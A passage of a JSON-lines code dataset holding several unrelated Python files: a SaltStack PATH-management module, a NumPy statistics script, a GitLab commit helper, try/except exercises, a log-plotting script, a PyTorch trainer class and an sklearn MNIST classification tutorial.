return True\n\n\ndef get_id(sls):\n \"\"\"\n Generate an id based on the sls\n\n Args\n\n sls (str):\n sls Saltstack variable ({{ sls }})\n\n Returns\n\n list:\n Return the id for a state\n\n \"\"\"\n return sls.replace(\"/\", \":\").replace(\".\", \":\")\n\n\ndef relpath(source, dest):\n \"\"\"\n Return the relative path between two paths\n\n Args\n\n source (str):\n Start path\n\n dest (str):\n End path\n\n Returns\n\n str:\n Return the relative path from the source to the dest path\n \"\"\"\n relpath = os.path.relpath(dest, source)\n if str(relpath).startswith(\".\"):\n return relpath\n else:\n return os.path.join(\".\", str(relpath))\n\n\ndef abspath(path):\n \"\"\"\n Return the absolute path of a path\n\n Args\n\n path (str):\n path to convert\n\n Returns\n\n str:\n Return the absolute path from the source to the dest path\n \"\"\"\n return os.path.abspath(path)\n\n\ndef get_env():\n \"\"\"\n Read the VSCode-Anywhere environment file and return a dict\n\n Returns\n\n dict:\n Returns a dictionnary environment\n \"\"\"\n found = {}\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n\n if os.path.isfile(env_file):\n with salt.utils.files.fopen(env_file) as _f:\n for line in _f.readlines():\n comment = re.search(\"^\\\\s*#\", line)\n if not comment:\n if salt.utils.platform.is_windows():\n search = re.search(\"^\\\\$env:(.*?)=(.*)$\", line)\n else:\n search = re.search(\"^(.*?)=(.*)$\", line)\n\n if search and len(search.groups()) == 2:\n found[search.group(1)] = search.group(2).strip('\"').strip(\"'\")\n return found\n\n\ndef is_path_env(val):\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n\n if salt.utils.platform.is_windows():\n sep = \";\"\n regex = \"^\\\\s*\\\\$env\\\\:PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n else:\n sep = \":\"\n regex = \"^\\\\s*PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n\n if os.path.isfile(env_file):\n with salt.utils.files.fopen(env_file, mode=\"r+\") as _f:\n for line in _f.readlines():\n search = re.search(regex, line)\n\n if search:\n if len(search.groups()) == 1 and val in search.group(1).split(sep):\n return True\n else:\n return False\n return False\n else:\n raise salt.exceptions.SaltInvocationError(\n \"File {} does not exist\".format(env_file)\n )\n\n\ndef append_path_env(val):\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n path = []\n find = False\n\n if salt.utils.platform.is_windows():\n sep = \";\"\n regex = \"^\\\\s*\\\\$env\\\\:PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n else:\n sep = \":\"\n regex = \"^\\\\s*PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n\n if os.path.isfile(env_file):\n orig_file = open(env_file, mode=\"r\").readlines()\n with salt.utils.files.fopen(env_file, mode=\"w\") as _f:\n for line in orig_file:\n search = re.search(regex, line)\n for v in val.split(sep):\n if search:\n find = True\n if len(search.groups()) == 1 and v not in search.group(1).split(\n sep\n ):\n path.append(v)\n\n if path and search and len(search.groups()) == 1:\n s_path = \"{}\".format(sep).join(path)\n\n if salt.utils.platform.is_windows():\n _f.write(\n '$env:PATH=\"{}{}{}\"\\n'.format(s_path, sep, search.group(1))\n )\n else:\n _f.write('PATH=\"{}{}{}\"\\n'.format(s_path, sep, search.group(1)))\n else:\n _f.write(\"{}\".format(line))\n\n if find is False:\n if salt.utils.platform.is_windows():\n _f.write('$env:PATH=\"{}\"'.format(val))\n else:\n _f.write('PATH=\"{}\"'.format(val))\n\n new_file = open(env_file, mode=\"r\").readlines()\n differences = __utils__[\"stringutils.get_diff\"](orig_file, new_file)\n return differences\n else:\n raise salt.exceptions.SaltInvocationError(\n \"File {} does not exist\".format(env_file)\n )\n\n\ndef remove_path_env(val):\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n path = []\n\n if salt.utils.platform.is_windows():\n sep = \";\"\n regex = \"^\\\\s*\\\\$env\\\\:PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n else:\n sep = \":\"\n regex = \"^\\\\s*PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n\n if os.path.isfile(env_file):\n orig_file = open(env_file, mode=\"r\").readlines()\n with salt.utils.files.fopen(env_file, mode=\"w\") as _f:\n for line in orig_file:\n search = re.search(regex, line)\n if search:\n path = search.group(1).split(sep)\n for v in val.split(sep):\n if v in path:\n path.remove(v)\n\n if path and search and len(search.groups()) == 1:\n s_path = \"{}\".format(sep).join(path)\n\n if salt.utils.platform.is_windows():\n _f.write('$env:PATH=\"{}\"\\n'.format(s_path))\n else:\n _f.write('PATH=\"{}\"\\n'.format(s_path))\n else:\n _f.write(\"{}\".format(line))\n\n new_file = open(env_file, mode=\"r\").readlines()\n differences = __utils__[\"stringutils.get_diff\"](orig_file, new_file)\n return differences\n else:\n raise salt.exceptions.SaltInvocationError(\n \"File {} does not exist\".format(env_file)\n )\n\n\ndef cleanup():\n if salt.utils.platform.is_windows():\n raise salt.exceptions.SaltInvocationError(\"Not yet available on Windows\")\n else:\n nix = __salt__[\"nix.collect_garbage\"]()\n brew = __salt__[\"cmd.run\"](\"/home/linuxbrew/.linuxbrew/bin/brew cleanup -s\")\n if brew == \"\":\n brew = \"Nothing to cleanup\"\n return {\n \"brew\": brew.splitlines(),\n \"nix\": nix,\n }\n # return \"Nix:\\n{}\\n\\nBrew:\\n{}\".format(\"\\n\".join(nix), brew)\n","repo_name":"gigi206/VSCode-Anywhere","sub_path":"_modules/vscode_anywhere.py","file_name":"vscode_anywhere.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"51"} +{"seq_id":"38245248472","text":"import numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser(description='Prints mean, median, std deviation, determinant and inverse')\nparser.add_argument('-p','--path', required=True, help='Relatve path to the csv file')\nargs = parser.parse_args()\n\ncsv = np.genfromtxt(args.path,delimiter=',')\nmat = np.round(csv).astype(int)\nrows, cols = mat.shape\n#print(mat)\n\n#Operations2.py\nmean = np.mean(mat, axis=0)\nprint(mean)\nmedian = np.median(mat, axis=0)\nprint(median)\ndeviat = np.std(mat, axis=0)\ndeviat_2 = np.around(deviat, decimals=2)\nprint(deviat_2)\ndeterminant = np.linalg.det(mat)\nprint(determinant)\nif(determinant!=0):\n inv = np.linalg.inv(mat)\n inverse_2 = np.around(inv, decimals=2)\n print(inverse_2)\nelse:\n pseudo = np.linalg.pinv(mat)\n pseudo_inv_2 = np.around(pseudo, decimals=2)\n print(pseudo_inv_2)\n\n\n","repo_name":"UtkarshRjn/cs251-assignments","sub_path":"outlab3/200050002-200050147/numpy/q2_a/operations2.py","file_name":"operations2.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"48031008364","text":"from bottle import request\nfrom config import *\nfrom api.auth import Gitlab\nfrom tools import get_custom_logger\nfrom tools import retry_with_active\n\nclass GitApi:\n def __init__(self, token, url):\n self.git_auth_instance = Gitlab(token, url)\n self.__logger = get_custom_logger('[ADC]', f'users',\"INFO\")\n self.data = self.git_auth_instance.gitlab_connect()\n\n def commit_files_branch(self, file_name):\n \"\"\"\n Add files gitlab server\n \"\"\"\n project = self.data.projects.get(BRANCH_ID)\n if file_name == \"l2m-users.dev\":\n commit_message = \"Update testing\"\n elif file_name ==\"l2m-users.prod\":\n commit_message = \"Update prod\"\n\n value = {\n 'branch': BRANCH,\n 'commit_message': commit_message,\n 'actions': [\n {\n 'action': 'update',\n 'file_path': f'{file_name}',\n 'content': open(f'{FILES_DIR}/{file_name}').read(),\n }\n ]\n }\n self.__logger.log(20, f'Payload {value}')\n commit = project.commits.create(value)\n self.__logger.log(20, f'Commit {commit}')\n if commit.stats.get('total') == 0:\n return \"SKIPPED\"\n else:\n result = self.get_pipelines()\n return result\n\n @retry_with_active(retries=8, sleep=3)\n def get_pipelines(self):\n project = self.data.projects.get(BRANCH_ID)\n pipeline = project.pipelines.get('latest')\n return pipeline\n\n @staticmethod\n def git_api_request():\n \"\"\"\n Get cookies value\n \"\"\"\n api_url = request.get_cookie('api_url', secret=secret)\n nm_token = request.get_cookie('nm_token', secret=secret)\n git_api_request = GitApi(nm_token, api_url)\n return git_api_request\n\n\n\n\n\n\n\n","repo_name":"alex19451/adc","sub_path":"tools/gitlab_api.py","file_name":"gitlab_api.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38237797129","text":"# a = 1\n# b = 0\n#\n# try:\n# result = a/b\n# print(result)\n# except:\n# print(\"Error!\")\nimport selenium.common\n# x = 9\n# y = 0\n#\n# try:\n# result = x / y\n# print(result)\n# except:\n# print(\"This is not allowed\")\n\n# a = 1\n# b = 0\n#\n# try:\n# result = a/b\n# print(result)\n# except ZeroDivisionError as zero_error:\n# print(zero_error)\n# print(\"Error! ZeroDivisionError\")\n\n# nominator = 100.21\n# denominator = \"a string\"\n# # denominator = 0\n# # denominator = 2\n#\n# try:\n# result = nominator/denominator\n# print(result)\n# except ZeroDivisionError as zero_error:\n# print(zero_error)\n# print(\"Error! ZeroDivisionError.\")\n# except TypeError as division_float_string:\n# print(division_float_string)\n# print(\"An exception TypeError occurred!\")\n# else:\n# print(result)\n# print(\"No errors!\")\n# finally:\n# print(\"I'm always here\")\n\n\n# def calculate_percent(value, total):\n# try:\n# percent = value * 100 / total\n# except TypeError as string_error:\n# # print(string_error)\n# print(\"Invalid values! {value} and {total} must be a valid number!\")\n# except ZeroDivisionError as zero_error:\n# # print(zero_error)\n# print(f\"Invalid values! {value} and {total} must be a valid number!\")\n# else:\n# # print(\"No errors!\")\n# print(percent)\n#\n#\n# calculate_percent(1, 2)\n# calculate_percent('1', 2)\n# calculate_percent('a', None)\n# calculate_percent(28, 0)\n# calculate_percent(50, 99)\n\n\n# try except in try except block construction\n# a = 0\n# b = 1\n#\n# try:\n# result = a/b\n# print(result)\n# except ZeroDivisionError as zero_error:\n# print(zero_error)\n# print(\"Error! ZeroDivisionError!\")\n# except TypeError as type_error:\n# print(type_error)\n# print(\"Error! TypeError!\")\n# else:\n# try:\n# result = b/a\n# print(result)\n# except:\n# print(\"No result\")\n# finally:\n# print(\"I'm always here\")\n\n\n# # Exercise try except with xpath list\n# from selenium import webdriver\n# from selenium.webdriver.chrome.service import Service\n# from selenium.webdriver.common.by import By\n#\n# driver = webdriver.Chrome(service=Service(r'C:\\TestFiles\\New_driver\\chromedriver.exe'))\n# driver.get('https://antoogle.testoneo.com')\n#\n# xpath_list = ['*yolo_this_is_not_xpath*', '//*[@class=\"this xpath cannot be found\"]',\n# '//*[@class=\"h6 mb-3 font-weight-normal\"]']\n#\n# for xpath in xpath_list:\n# try:\n# elem = driver.find_element(By.XPATH, xpath)\n# # print(elem.text)\n# except selenium.common.exceptions.InvalidSelectorException as invalid_selector_exceptions:\n# print(invalid_selector_exceptions)\n# print(f'XPath {xpath} is broken!')\n# except selenium.common.exceptions.NoSuchElementException as no_such_element_exception:\n# print(no_such_element_exception)\n# print(f'Element with {xpath} not found')\n# else:\n# print(f'XPath {xpath} is fine and element was found - good job!')\n#\n# driver.quit()\n\n\n# # Calculator project with raise Exception\n# class Calculator(object):\n# def multiply(value_1, value_2):\n# return value_1 * value_2\n#\n# def add(value_1, value_2):\n# return value_1 + value_2\n#\n# def divide(value_1, value_2):\n# raise NotImplementedError('Not implemented yet!')\n#\n#\n# print(Calculator.multiply(2, 6))\n# print(Calculator.add(2, 6))\n# print(Calculator.divide(2, 6))\n\n\n# Raise in practice\ndef unsafe_calculate_percent(value, total):\n try:\n return value * 100 / total\n except TypeError:\n raise ValueError(f'Invalid values! {value} and {total} must be a valid number!')\n except ZeroDivisionError:\n raise ValueError(f'Invalid values! {value} and {total} must be a valid number!')\n\n\ndef safe_calculate_percent(value, total):\n try:\n percent = unsafe_calculate_percent(value, total)\n except ValueError as value_error:\n print(value_error)\n else:\n print(f'{value} from {total} is {percent}%')\n\n\nsafe_calculate_percent(1, 2)\nsafe_calculate_percent('1', 2)\nsafe_calculate_percent('a', None)\nsafe_calculate_percent(28, 0)\nsafe_calculate_percent(50, 99)","repo_name":"SylWit94/Learning-of-Python-and-Selenium","sub_path":"Python_2/try_except.py","file_name":"try_except.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10647438220","text":"\"\"\"\nGiven a training log file, plot something.\n\"\"\"\nimport csv\nimport matplotlib.pyplot as plt\n\ndef main(training_log):\n with open(training_log) as fin:\n reader = csv.reader(fin)\n next(reader, None) # skip the header\n val_accuracies = []\n val_losses = []\n accs = []\n losss = []\n top_5_accuracies = []\n top_5_loss = []\n ep = []\n cnn_benchmark = [] # this is ridiculous\n for epoch,acc,loss,top_k_categorical_accuracy,val_acc,val_loss,val_top_k_categorical_accuracy in reader:\n val_accuracies.append(float(val_acc))\n top_5_accuracies.append(float(val_top_k_categorical_accuracy))\n val_losses.append(float(val_loss))\n accs.append(float(acc))\n losss.append(float(loss))\n ep.append(int(epoch))\n\n # plt.plot(val_accuracies)\n # plt.plot(accs)\n # plt.xlabel(\"epoch\")\n # plt.ylabel(\"accuracy\")\n # plt.title(\"Accuracy of a 100-Frame Sequence\")\n # plt.legend(['validation','training'], loc='lower right')\n\n plt.title(\"Loss of a 100-Frame Sequence\")\n plt.plot(val_losses)\n plt.plot(losss)\n plt.ylabel(\"loss\")\n plt.xlabel(\"epoch\")\n plt.legend(['validation','training'], loc='upper right')\n\n # plt.plot(top_5_accuracies)\n plt.show()\n\nif __name__ == '__main__':\n# 80\n # lstm-training-1559101864.9963527\n # lstm-training-1559111706.9777737\n\n# 90\n # lstm-training-1557119933.7469792\n # lstm-training-1557084128.406245\n\n# 100\n # lstm-training-1559536009.4090457\n # lstm-training-1559532020.046076\n # # lstm-training-1559258359.0995955\n # # lstm-training-1559528792.43136\n\n training_log = 'data/logs/lstm-training-1559536009.4090457.log'\n main(training_log)","repo_name":"ckftahadlangit/Locking-Dance-Style-Classification","sub_path":"plot_trainlog.py","file_name":"plot_trainlog.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34828902618","text":"import logging\r\nimport os\r\nfrom collections import defaultdict\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.utils.data import DataLoader\r\nfrom yacs.config import CfgNode\r\n\r\nfrom lib.dataset import build_data_loaders\r\nfrom lib.dataset.utils import get_data_config\r\nfrom lib.models import build_model\r\nfrom lib.models.losses import Accuracy, build_loss\r\nfrom lib.solver import build_lr_scheduler, build_optimizer\r\nfrom lib.utils import AverageMeter, Meters, get_last_n_median, save_checkpoint\r\nfrom lib.utils.writer import CommonMetricPrinter, JSONWriter, TensorboardWriter\r\nfrom typing import Tuple\r\n\r\n\r\nclass BaseTrainer:\r\n \"\"\"class for BaseTrainer\"\"\"\r\n\r\n def __init__(\r\n self, cfg, model, optimizer, l_loader, ul_loader=None, valid_loader=None, test_loader=None\r\n ):\r\n # configuration\r\n model.train()\r\n self.cfg = cfg\r\n self.data_cfg = get_data_config(cfg)\r\n self.device = cfg.GPU_ID\r\n\r\n # data loaders\r\n self.l_loader = l_loader\r\n self._l_iter = iter(l_loader)\r\n\r\n self.with_ul = ul_loader is not None\r\n if self.with_ul:\r\n self.ul_loader = ul_loader\r\n self._ul_iter = iter(ul_loader)\r\n\r\n self.valid_loader = valid_loader\r\n self.test_loader = test_loader\r\n\r\n # build model and losses\r\n self.model = model\r\n self.accuracy = Accuracy(model.num_classes)\r\n self.l_loss = self.build_labeled_loss(cfg)\r\n\r\n # optimizer\r\n self.optimizer = optimizer\r\n\r\n # scheduler\r\n self.apply_scheduler = cfg.SOLVER.APPLY_SCHEDULER\r\n self.scheduler = self.build_lr_scheduler(cfg, optimizer)\r\n\r\n # training steps\r\n self.start_iter = 0\r\n self.max_iter = cfg.SOLVER.MAX_ITER\r\n\r\n # for logging purpose\r\n self.logger = logging.getLogger()\r\n self.meters = Meters()\r\n self.writers = self._build_writers(cfg)\r\n self.iter_timer = AverageMeter()\r\n self.eval_history = defaultdict(list)\r\n\r\n def load_checkpoint(self, resume: str) -> None:\r\n self.logger.info(f\"resume checkpoint from: {resume}\")\r\n\r\n state_dict = torch.load(resume)\r\n # load model\r\n self.model.load_state_dict(state_dict[\"model\"])\r\n\r\n # load ema model\r\n if self.with_ul and state_dict[\"ema_model\"] is not None:\r\n self.ema_model.load_state_dict(state_dict[\"ema_model\"])\r\n\r\n # load optimizer and scheduler\r\n self.optimizer.load_state_dict(state_dict[\"optimizer\"])\r\n self.scheduler.load_state_dict(state_dict[\"scheduler\"])\r\n\r\n # process meta information\r\n start_iter = 0\r\n meta_dict = state_dict[\"meta\"]\r\n if meta_dict is not None and \"iter\" in meta_dict.keys():\r\n start_iter = meta_dict[\"iter\"] + 1\r\n\r\n dict_str = \" \".join([f\"{k}: {v}\" for k, v in meta_dict.items() if \"iter\" not in k])\r\n self.logger.info(\r\n \"Successfully loaded the checkpoint. \"\r\n f\"start_iter: {start_iter} \"\r\n f\"intermediate status: {dict_str}\"\r\n )\r\n\r\n # loaded\r\n self.start_iter = start_iter\r\n\r\n def save_checkpoint(self, *, save_ema_model: bool = False) -> None:\r\n # meta information construction\r\n meta_dict = {\"iter\": self.iter + 1}\r\n for prefix, history in self.eval_history.items():\r\n current_val = history[-1]\r\n max_val = max(history)\r\n meta_dict[prefix] = current_val\r\n meta_dict[prefix + \"_\" + \"best\"] = max_val\r\n meta_dict[prefix + \"_\" + \"median20\"] = get_last_n_median(history, n=20)\r\n\r\n is_best = False\r\n prefix = \"valid/top1\"\r\n if meta_dict[prefix] >= meta_dict[prefix + \"_best\"]:\r\n is_best = True\r\n\r\n is_final_iter = self.iter + 1 == self.max_iter\r\n checkpoint_name = \"model_final.pth.tar\" if is_final_iter else \"checkpoint.pth.tar\"\r\n save_checkpoint(\r\n self.cfg.OUTPUT_DIR,\r\n self.model,\r\n self.optimizer,\r\n self.scheduler,\r\n is_best=is_best,\r\n ema_model=self.ema_model if self.with_ul else None,\r\n meta_dict=meta_dict,\r\n file_name=checkpoint_name\r\n )\r\n\r\n def _build_writers(self, cfg: CfgNode) -> list:\r\n writers = (\r\n [\r\n CommonMetricPrinter(max_iter=self.max_iter),\r\n JSONWriter(os.path.join(self.cfg.OUTPUT_DIR, \"metrics.json\")),\r\n TensorboardWriter(log_dir=self.cfg.OUTPUT_DIR)\r\n ]\r\n )\r\n return writers\r\n\r\n def build_labeled_loss(self, cfg: CfgNode, warmed_up=False) -> nn.Module:\r\n loss_type = cfg.MODEL.LOSS.LABELED_LOSS\r\n num_classes = cfg.MODEL.NUM_CLASSES\r\n assert loss_type == \"CrossEntropyLoss\"\r\n\r\n class_count = self.get_label_dist(device=self.device)\r\n per_class_weights = None\r\n if cfg.MODEL.LOSS.WITH_LABELED_COST_SENSITIVE and warmed_up:\r\n loss_override = cfg.MODEL.LOSS.COST_SENSITIVE.LOSS_OVERRIDE\r\n beta = cfg.MODEL.LOSS.COST_SENSITIVE.BETA\r\n if beta < 1:\r\n # effective number of samples;\r\n effective_num = 1.0 - torch.pow(beta, class_count)\r\n per_class_weights = (1.0 - beta) / effective_num\r\n else:\r\n per_class_weights = 1.0 / class_count\r\n\r\n # sum to num_classes\r\n per_class_weights = per_class_weights / torch.sum(per_class_weights) * num_classes\r\n\r\n if loss_override == \"\":\r\n # CE loss\r\n loss_fn = build_loss(\r\n cfg, loss_type, class_count=class_count, class_weight=per_class_weights\r\n )\r\n\r\n elif loss_override == \"LDAM\":\r\n # LDAM loss\r\n loss_fn = build_loss(\r\n cfg, \"LDAMLoss\", class_count=class_count, class_weight=per_class_weights\r\n )\r\n\r\n else:\r\n raise ValueError()\r\n else:\r\n loss_fn = build_loss(\r\n cfg, loss_type, class_count=class_count, class_weight=per_class_weights\r\n )\r\n\r\n return loss_fn\r\n\r\n @classmethod\r\n def build_model(cls, cfg: CfgNode) -> nn.Module:\r\n model = build_model(cfg)\r\n return model\r\n\r\n @classmethod\r\n def build_optimizer(cls, cfg: CfgNode, model: nn.Module) -> optim.Optimizer:\r\n return build_optimizer(cfg, model)\r\n\r\n @classmethod\r\n def build_lr_scheduler(\r\n cls, cfg: CfgNode, optimizer: optim.Optimizer, override_max_iter=None\r\n ) -> optim.lr_scheduler._LRScheduler:\r\n return build_lr_scheduler(cfg, optimizer, override_max_iter=override_max_iter)\r\n\r\n @classmethod\r\n def build_data_loaders(cls, cfg: CfgNode) -> Tuple[DataLoader]:\r\n return build_data_loaders(cfg)\r\n","repo_name":"ytaek-oh/daso","sub_path":"lib/engine/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"51"} +{"seq_id":"22381481758","text":"# El siguiente código recupera el conjunto de datos MNIST\r\nfrom sklearn.datasets import fetch_mldata\r\nmnist = fetch_mldata('MNIST original')\r\n\r\nX, y = mnist[\"data\"], mnist[\"target\"]\r\n# X.shape\r\n# y.shape\r\n\r\n#%% Echemos un vistazo a un dígito del conjunto de datos\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\nsome_digit = X[36000]\r\nsome_digit_image = some_digit.reshape(28, 28)\r\nplt.imshow(some_digit_image, cmap = matplotlib.cm.binary, interpolation=\"nearest\")\r\nplt.axis(\"off\")\r\nplt.show()\r\n\r\ndef plot_digit(data):\r\n image = data.reshape(28, 28)\r\n plt.imshow(image, cmap = matplotlib.cm.binary, interpolation=\"nearest\")\r\n plt.axis(\"off\")\r\n\r\n# y[36000]\r\n\r\n#%% You should always create a test set and set it aside before inspecting the data closely\r\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\r\n\r\n# Let’s also shuffle the training set\r\nimport numpy as np\r\nshuffle_index = np.random.permutation(60000)\r\nX_train, y_train = X_train[shuffle_index], y_train[shuffle_index]\r\n\r\n#%% Training a Binary Classifier\r\ny_train_5 = (y_train == 5) # True for all 5s, False for all other digits.\r\ny_test_5 = (y_test == 5)\r\n\r\n# now let’s pick a classifier and train it. A good place to start is with a Stochastic\r\n# Gradient Descent (SGD) classifier\r\nfrom sklearn.linear_model import SGDClassifier\r\nsgd_clf = SGDClassifier(random_state=42)\r\nsgd_clf.fit(X_train, y_train_5)\r\n\r\n# Now you can use it to detect images of the number 5\r\nsgd_clf.predict([some_digit])\r\n\r\n#%% Performance Measures\r\n# Measuring Accuracy Using Cross-Validation\r\n# Remember that K-fold crossvalidation\r\n# means splitting the training set into K-folds (in this case, three), then making\r\n# predictions and evaluating them on each fold using a model trained on the\r\n# remaining folds\r\nfrom sklearn.model_selection import cross_val_score\r\ncross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\r\n# Out[28]: array([0.963 , 0.9673, 0.9649])\r\n# Above 95% accuracy\r\n\r\n# veamos un clasificador muy tonto que solo clasifica cada imagen en la clase \"no-5\"\r\nfrom sklearn.base import BaseEstimator\r\n\r\nclass Never5Classifier(BaseEstimator):\r\n def fit(self, X, y=None):\r\n pass\r\n def predict(self, X):\r\n return np.zeros((len(X), 1), dtype=bool)\r\n\r\nnever_5_clf = Never5Classifier()\r\ncross_val_score(never_5_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\r\n# Out[32]: array([0.9077 , 0.91095, 0.9103 ])\r\n# That’s right, it has over 90% accuracy! This is simply because only about 10% of the\r\n# images are 5s, so if you always guess that an image is not a 5, you will be right about\r\n# 90% of the time.\r\n\r\n#%% Confusion Matrix\r\n# La idea general es contar el número de veces que las instancias de la clase A se clasifican como clase B.\r\nfrom sklearn.model_selection import cross_val_predict\r\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nconfusion_matrix(y_train_5, y_train_pred)\r\n# Out[36]:\r\n# array([[53843, 736],\r\n# [ 1360, 4061]], dtype=int64)\r\n\r\n# Each row in a confusion matrix represents an actual class, while each column represents\r\n# a predicted class\r\n# The first row of this matrix considers non-5 images (the negative\r\n# class): 53543 of them were correctly classified as non-5s (they are called true\r\n# negatives), while the remaining 736 were wrongly classified as 5s (false positives).\r\n# The second row considers the images of 5s (the positive class): 1360 were wrongly\r\n# classified as non-5s (false negatives), while the remaining 4061 were correctly classified\r\n# as 5s (true positives)\r\n\r\n# Precision and Recall\r\n# precision = TP / (TP + FP)\r\n# recall = TP / (TP + FN)\r\nfrom sklearn.metrics import precision_score, recall_score\r\nprecision_score(y_train_5, y_train_pred)\r\n# Out[38]: 0.8465707734000417\r\nrecall_score(y_train_5, y_train_pred)\r\n# Out[39]: 0.7491237779007563\r\n\r\n# Cuando afirma que una imagen representa un 5, es correcta solo el 84% del tiempo.\r\n# Además, solo detecta el 74% de los 5s.\r\n\r\n# It is often convenient to combine precision and recall into a single metric called the F1\r\n# score, in particular if you need a simple way to compare two classifiers. The F1 score is\r\n# the harmonic mean of precision and recall\r\nfrom sklearn.metrics import f1_score\r\nf1_score(y_train_5, y_train_pred)\r\n# Out[40]: 0.7948717948717948\r\n\r\n\r\n# Precision/Recall Tradeoff\r\n\r\n# Instead of calling the classifier’s\r\n# predict() method, you can call its decision_function() method, which returns a\r\n# score for each instance, and then make predictions based on those scores using any\r\n# threshold you want\r\ny_scores = sgd_clf.decision_function([some_digit])\r\ny_scores\r\n# Out[4]: array([110733.94625458])\r\nthreshold = 0\r\ny_some_digit_pred = (y_scores > threshold)\r\ny_some_digit_pred\r\n# Out[6]: array([ True])\r\n\r\nthreshold = 200000\r\ny_some_digit_pred = (y_scores > threshold)\r\ny_some_digit_pred\r\n# Out[7]: array([False])\r\n\r\n# This confirms that raising the threshold decreases recall. The image actually represents\r\n# a 5, and the classifier detects it when the threshold is 0, but it misses it when the\r\n# threshold is increased to 200,000.\r\n\r\n# So how can you decide which threshold to use?\r\ny_scores = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3, method=\"decision_function\")\r\n\r\n# Now with these scores you can compute precision and recall for all possible thresholds\r\n# using the precision_recall_curve() function\r\n\r\nfrom sklearn.metrics import precision_recall_curve\r\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\r\n\r\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\r\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\r\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\r\n plt.xlabel(\"Threshold\")\r\n plt.legend(loc=\"upper left\")\r\n plt.ylim([0, 1])\r\n plt.title(\"Precision and recall versus the decision threshold\")\r\n plt.grid()\r\n\r\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\r\nplt.show()\r\n\r\n# Now you can simply select the threshold value that gives you the best precision/recall\r\n# tradeoff for your task\r\n\r\n# So let’s suppose you decide to aim for 90% precision. You look up the first plot\r\n# (zooming in a bit) and find that you need to use a threshold of about 51309. To make\r\n# predictions (on the training set for now), instead of calling the classifier’s predict()\r\n# method, you can just run this code\r\ny_train_pred_90 = (y_scores > 51309)\r\nprecision_score(y_train_5, y_train_pred_90)\r\n# Out[23]: 0.8999016232169208\r\nrecall_score(y_train_5, y_train_pred_90)\r\n# Out[24]: 0.6749677181331858\r\n\r\n#%% The receiver operating characteristic (ROC)\r\n# the ROC curve plots the true positive rate (another name\r\n# for recall) against the false positive rate\r\nfrom sklearn.metrics import roc_curve\r\nfpr, tpr, thresholds = roc_curve(y_train_5, y_scores)\r\n\r\ndef plot_roc_curve(fpr, tpr, label=None):\r\n plt.plot(fpr, tpr, linewidth=2, label=label)\r\n plt.plot([0, 1], [0, 1], 'k--')\r\n plt.axis([0, 1, 0, 1])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title(\"FPR against the TPR\")\r\n plt.grid()\r\n\r\nplot_roc_curve(fpr, tpr)\r\nplt.show()\r\n\r\n# One way to compare classifiers is to measure the area under the curve (AUC).\r\n# A perfect classifier will have a ROC AUC equal to 1\r\nfrom sklearn.metrics import roc_auc_score\r\nroc_auc_score(y_train_5, y_scores)\r\n# Out[28]: 0.9643213182731702\r\n\r\n# Let’s train a RandomForestClassifier and compare its ROC curve and ROC AUC\r\n# score to the SGDClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nforest_clf = RandomForestClassifier(random_state=42)\r\ny_probas_forest = cross_val_predict(forest_clf, X_train, y_train_5, cv=3, method=\"predict_proba\")\r\n\r\ny_scores_forest = y_probas_forest[:, 1] # score = proba of positive class\r\nfpr_forest, tpr_forest, thresholds_forest = roc_curve(y_train_5,y_scores_forest)\r\n\r\nplt.plot(fpr, tpr, \"b:\", label=\"SGD\")\r\nplot_roc_curve(fpr_forest, tpr_forest, \"Random Forest\")\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n# the RandomForestClassifier’s ROC curve looks much\r\n# better than the SGDClassifier’s: it comes much closer to the top-left corner\r\n\r\nroc_auc_score(y_train_5, y_scores_forest)\r\n# Out[35]: 0.9930241854404718\r\n\r\n\r\n#%% Multiclass Classification\r\nsgd_clf.fit(X_train, y_train) # y_train, not y_train_5\r\nsgd_clf.predict([some_digit])\r\n# Out[36]: array([5.])\r\n\r\nsome_digit_scores = 